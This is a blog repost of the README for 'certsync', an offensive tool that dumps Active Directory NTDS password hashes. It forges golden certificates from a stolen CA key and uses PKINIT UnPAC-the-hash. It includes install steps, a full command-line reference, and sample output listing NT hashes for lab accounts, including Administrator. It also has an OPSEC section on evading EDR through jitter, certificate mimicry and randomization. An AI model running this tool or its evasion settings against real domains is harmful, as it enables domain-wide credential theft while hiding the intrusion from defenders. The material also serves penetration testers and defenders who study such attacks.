Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash


certsync is a new technique in order to dump NTDS remotely, but this time without DRSUAPI: it uses golden certificate and UnPAC the hash. It works in several steps:

  1. Dump user list, CA informations and CRL from LDAP
  2. Dump CA certificate and private key
  3. Forge offline a certificate for every user
  4. UnPAC the hash for every user in order to get nt and lm hashes
$ certsync -u khal.drogo -p 'horse' -d essos.local -dc-ip 192.168.56.12 -ns 192.168.56.12
[*] Collecting userlist, CA info and CRL on LDAP
[*] Found 13 users in LDAP
[*] Found CA ESSOS-CA on braavos.essos.local(192.168.56.23)
[*] Dumping CA certificate and private key
[*] Forging certificates for every users. This can take some time...
[*] PKINIT + UnPAC the hashes
ESSOS.LOCAL/BRAAVOS$:1104:aad3b435b51404eeaad3b435b51404ee:08083254c2fd4079e273c6c783abfbb7:::
ESSOS.LOCAL/MEEREEN$:1001:aad3b435b51404eeaad3b435b51404ee:b79758e15b7870d28ad0769dfc784ca4:::
ESSOS.LOCAL/sql_svc:1114:aad3b435b51404eeaad3b435b51404ee:84a5092f53390ea48d660be52b93b804:::
ESSOS.LOCAL/jorah.mormont:1113:aad3b435b51404eeaad3b435b51404ee:4d737ec9ecf0b9955a161773cfed9611:::
ESSOS.LOCAL/khal.drogo:1112:aad3b435b51404eeaad3b435b51404ee:739120ebc4dd940310bc4bb 5c9d37021:::
ESSOS.LOCAL/viserys.targaryen:1111:aad3b435b51404eeaad3b435b51404ee:d96a55df6bef5e0b4d6d956088036097:::
ESSOS.LOCAL/daenerys.targaryen:1110:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
ESSOS.LOCAL/SEVENKINGDOMS$:1105:aad3b435b51404eeaad3b435b51404ee:b63b6ef2caab52ffcb26b3870dc0c4db:::
ESSOS.LOCAL/vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::
ESSOS.LOCAL/Administrator:500:aad3b435b51404eeaad3b435b51404ee:54296a48cd30259cc88095373cec24da:::

Contrary to what we may think, the attack is not at all slower.


Installation

git clone https://github.com/zblurx/certsync
cd certsync
pip install .

or

pip install certsync

Usage

$ certsync -h
usage: certsync [-h] [-debug] [-outputfile OUTPUTFILE] [-ca-pfx pfx/p12 file name] [-ca-ip ip address] [-d domain.local] [-u username] [-p password] [-hashes LMHASH:NTHASH]
[-no-pass] [-k] [-aesKey hex key] [-use-kcache] [-kdcHost KDCHOST] [-scheme ldap scheme] [-ns nameserver] [-dns-tcp] [-dc-ip ip address]
[-ldap-filter LDAP_FILTER] [-template cert.pfx] [-timeout timeout] [-jitter jitter] [-randomize]

Dump NTDS with golden certificates and PKINIT

options:
-h, --help show this help message and exit
-debug Turn DEBUG output ON
-outputfile OUTPUTFILE
base output filename

CA options:
-ca-pfx pfx/p12 file name
Path to CA certificate
-ca-ip ip address IP Address of the certificate authority. If omitted it will use the domainpart (FQDN) specified in LDAP

authenticati on options:
-d domain.local, -domain domain.local
Domain name
-u username, -username username
Username
-p password, -password password
Password
-hashes LMHASH:NTHASH
NTLM hashes, format is LMHASH:NTHASH
-no-pass don't ask for password (useful for -k)
-k Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it
will use the ones specified in the command line
-aesKey hex key AES key to use for Kerberos Authentication (128 or 256 bits)
-use-kcache Use Kerberos authe ntication from ccache file (KRB5CCNAME)
-kdcHost KDCHOST FQDN of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

connection options:
-scheme ldap scheme
-ns nameserver Nameserver for DNS resolution
-dns-tcp Use TCP instead of UDP for DNS queries
-dc-ip ip address IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter

OPSEC options:
-ldap-filter LDAP_FILTER
ldap filter to dump users. Default is (&(|(objectCategory=person)(objectClass=computer))(objectClass=user))
-template cert.pfx base template to use in order to forge certificates
-timeout timeout Timeout between PKINIT connection
-jitter jitter Jitter between PKINIT connecti on
-randomize Randomize certificate generation. Takes longer to generate all the certificates

Why

DSRUAPI is more and more monitored and sometimes retricted by EDR solutions. Moreover, certsync does not require to use a Domain Administrator, it only require a CA Administrator.

Requirements

This attack needs:

  • A configured Entreprise CA on an ADCS server in the domain,
  • PKINIT working,
  • An domain account which is local administrator on the ADCS server, or an export of the CA certificate and private key.

Limitations

Since we cannot PKINIT for users that are revoked, we cannot dump thier hashes.

OPSEC

Some options were added to customize the behaviour of the tool:

  • -ldap-filter: change the LDAP filter used to select usernames to certsync.
  • -template: use an already delivered certificate to mimic it when forging users certificates.
  • -timeout and -jitter: change timeout between PKINIT authentication requests.
  • -randomize: By default, every forged user certificates will have the same private key, serial number and validity dates. This parameter will randomize them, but the forging will take longer.

Credits



Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash Certsync - Dump NTDS With Golden Certificates And UnPAC The Hash Reviewed by Zion3R on 8:30 AM Rating: 5